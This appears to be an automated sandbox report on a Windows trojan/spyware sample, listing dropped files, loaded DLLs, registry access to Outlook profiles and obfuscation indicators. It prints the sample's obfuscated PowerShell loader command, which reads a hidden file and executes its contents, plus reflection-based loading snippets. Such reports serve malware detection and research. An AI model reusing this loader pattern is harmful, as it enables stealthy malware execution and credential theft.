        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B00405_2_219B0040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BE8705_2_219BE870
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BB6705_2_219BB670
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B322385_2_21B32238
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B329205_2_21B32920
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B30D885_2_21B30D88
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B330085_2_21B33008
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B314705_2_21B31470
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B336F05_2_21B336F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B31B505_2_21B31B50
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B300125_2_21B30012
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B300405_2_21B30040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B322275_2_21B32227
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B309EA5_2_21B309EA
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B329115_2_21B32911
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B30A105_2_21B30A10
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B30D785_2_21B30D78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B32FF85_2_21B32FF8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B314665_2_21B31466
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B336E15_2_21B336E1
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21B31B415_2_21B31B41
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21C2392F5_2_21C2392F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21C2323D5_2_21C2323D
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21C291305_2_21C29130
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21C21A205_2_21C21A20
        Source: TjoY7n65om.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/13@5/5
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00403359 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,5_2_00403359
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
        Source: C:\Users\user\Desktop\TjoY7n65om.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
        Source: C:\Users\user\Desktop\TjoY7n65om.exeFile created: C:\Users\user\AppData\Roaming\luminancesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
        Source: C:\Users\user\Desktop\TjoY7n65om.exeFile created: C:\Users\user\AppData\Local\Temp\nsx68DF.tmpJump to behavior
        Source: TjoY7n65om.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
        Source: C:\Users\user\Desktop\TjoY7n65om.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Bivejens.exe, 00000005.00000002.2610716890.000000001E970000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: TjoY7n65om.exeReversingLabs: Detection: 50%
        Source: TjoY7n65om.exeVirustotal: Detection: 65%
        Source: C:\Users\user\Desktop\TjoY7n65om.exeFile read: C:\Users\user\Desktop\TjoY7n65om.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\TjoY7n65om.exe "C:\Users\user\Desktop\TjoY7n65om.exe"
        Source: C:\Users\user\Desktop\TjoY7n65om.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Bivejens.exe "C:\Users\user\AppData\Local\Temp\Bivejens.exe"
        Source: C:\Users\user\Desktop\TjoY7n65om.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)" Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Bivejens.exe "C:\Users\user\AppData\Local\Temp\Bivejens.exe"Jump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: TjoY7n65om.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Troldmandsorganisationerne $Lvetmmer $Systemskitserne), (Allokeret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:polybuttoned = [AppDomain]::CurrentDomai
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Decompoundly55)), $Trblseres).DefineDynamicModule($Blaastjerners, $false).DefineType($Blgepappen, $Containerne, [System.MulticastDeleg
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_3_0019CA98 pushfd ; retf 0019h5_3_0019CA99
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_3_0019CF4C push eax; iretd 5_3_0019CF4D
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_3_0019EEA8 push eax; iretd 5_3_0019EEA9
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_3_0019EE60 push eax; iretd 5_3_0019EE65
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_00159C30 push esp; retf 0017h5_2_00159D55
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015B4C7 push dword ptr [ebp+ecx-75h]; retf 5_2_0015B4D2
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015B539 push dword ptr [ebp+ebx-75h]; iretd 5_2_0015B53D
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_0015891E pushad ; iretd 5_2_0015891F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_016F49AA push ecx; iretd 5_2_016F49AD
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21C236A6 push es; retf 5_2_21C236A7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Bivejens.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\TjoY7n65om.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
